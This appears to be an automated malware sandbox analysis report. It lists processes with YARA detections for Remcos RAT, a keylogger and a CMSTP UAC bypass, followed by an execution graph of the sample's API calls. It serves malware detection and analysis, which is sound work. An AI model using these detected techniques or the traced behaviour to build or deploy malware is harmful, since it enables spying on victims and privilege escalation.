                        Start date:25/09/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmd.exe
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        Target ID:26
                        Start time:10:04:29
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:10:04:41
                        Start date:25/09/2024
                        Path:C:\Windows\SysWOW64\explorer.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\explorer.exe
                        Imagebase:0x400000
                        File size:4'514'184 bytes
                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        Target ID:28
                        Start time:10:04:44
                        Start date:25/09/2024
                        Path:C:\Windows\SysWOW64\explorer.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\explorer.exe
                        Imagebase:0x400000
                        File size:4'514'184 bytes
                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.3213566358.0000000002F12000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.3213673292.0000000002F1F000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:17.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:25.9%
                          Total number of Nodes:1474
                          Total number of Limit Nodes:20
                          execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9543 404996 9067->9543 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9561 403e70 9074->9561 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9592 403093 9125->9592 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9626 402f6c ??2@YAPAXI 9132->9626 9632 402425 ??3@YAXPAX ??3@YAXPAX 9132->9632 9134->9131 9566 404cbc 9134->9566 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9659 403b40 9167->9659 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9633 40484d 9176->9633 9644 40408b 9176->9644 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9679 4082e9 9180->9679 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9658 402425 ??3@YAXPAX ??3@YAXPAX 9182->9658 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9721 403f85 9198->9721 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9734 40786b 9219->9734 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9706 407613 9222->9706 9715 407674 9222->9715 9224->9222 9225 405d20 9226 405d65 9225->9226 9740 403e0d 9225->9740 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9744 40453e 9233->9744 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9753 4043c6 9252->9753 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9533 4048ab 9268->9533 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 